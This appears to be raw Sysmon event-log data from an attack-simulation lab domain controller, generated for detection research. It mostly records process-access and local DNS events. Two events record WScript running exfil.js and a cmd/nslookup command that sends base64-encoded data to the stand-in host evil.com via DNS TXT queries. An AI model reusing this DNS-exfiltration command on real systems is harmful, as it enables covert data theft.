14:21:34.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.344{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0A44-000000005F02}3360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.344{2E1864BB-18EE-629A-0844-000000005F02}75523212C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-0A44-000000005F02}3360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.349{2E1864BB-18EE-629A-0A44-000000005F02}3360C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-0844-000000005F02}7552C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljvukm.tmp 2>&1 10341000x8000000000000000209922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.328{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0944-000000005F02}6004C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.328{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0944-000000005F02}6004C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.328{2E1864BB-18EE-629A-0944-000000005F02}60047568C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0844-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0944-000000005F02}6004C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0844-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.312{2E1864BB-18E0-629A-6742-000000005F02}39765252C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-0844-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.315{2E1864BB-18EE-629A-0844-000000005F02}7552C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljvukm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000209911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.547{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50751- 354300x8000000000000000209910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.546{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-50750-false127.0.0.1-53domain 354300x8000000000000000209909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50750- 354300x8000000000000000209908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.546{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-50750-false127.0.0.1-53domain 354300x8000000000000000209907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50749- 354300x8000000000000000209906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.546{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-50749-false127.0.0.1-53domain 354300x8000000000000000209905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50748- 354300x8000000000000000209904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-50747-false127.0.0.1-53domain 354300x8000000000000000209903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50747- 354300x8000000000000000209902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-50747-false127.0.0.1-53domain 354300x8000000000000000209901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-50746-false127.0.0.1-53domain 354300x8000000000000000209900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50746- 354300x8000000000000000209899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.469{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-50746-false127.0.0.1-53domain 354300x8000000000000000209898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{00000000-0000-0000-0000-000000000000}5196<unknown process>-udpfalsefalse127.0.0.1-50745-false127.0.0.1-53domain 354300x8000000000000000209897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50745- 354300x8000000000000000209896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{00000000-0000-0000-0000-000000000000}4728<unknown process>-udpfalsefalse127.0.0.1-50733-false127.0.0.1-53domain 354300x8000000000000000209895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{00000000-0000-0000-0000-000000000000}4728<unknown process>-udptruefalse127.0.0.1-50733-false127.0.0.1-53domain 354300x8000000000000000209894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.961{00000000-0000-0000-0000-000000000000}6032<unknown process>-udpfalsefalse127.0.0.1-50732-false127.0.0.1-53domain 354300x8000000000000000209893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.961{00000000-0000-0000-0000-000000000000}6032<unknown process>-udptruefalse127.0.0.1-50732-false127.0.0.1-53domain 354300x8000000000000000209892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{00000000-0000-0000-0000-000000000000}6032<unknown process>-udpfalsefalse127.0.0.1-50731-false127.0.0.1-53domain 354300x8000000000000000209891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{00000000-0000-0000-0000-000000000000}6032<unknown process>-udptruefalse127.0.0.1-50731-false127.0.0.1-53domain 354300x8000000000000000209890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{00000000-0000-0000-0000-000000000000}6032<unknown process>-udpfalsefalse127.0.0.1-50730-false127.0.0.1-53domain 354300x8000000000000000209889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{00000000-0000-0000-0000-000000000000}6032<unknown process>-udptruefalse127.0.0.1-50730-false127.0.0.1-53domain 23542300x8000000000000000209888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.297{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzge.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.281{2E1864BB-18EE-629A-0644-000000005F02}55841044C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0744-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.281{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0744-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 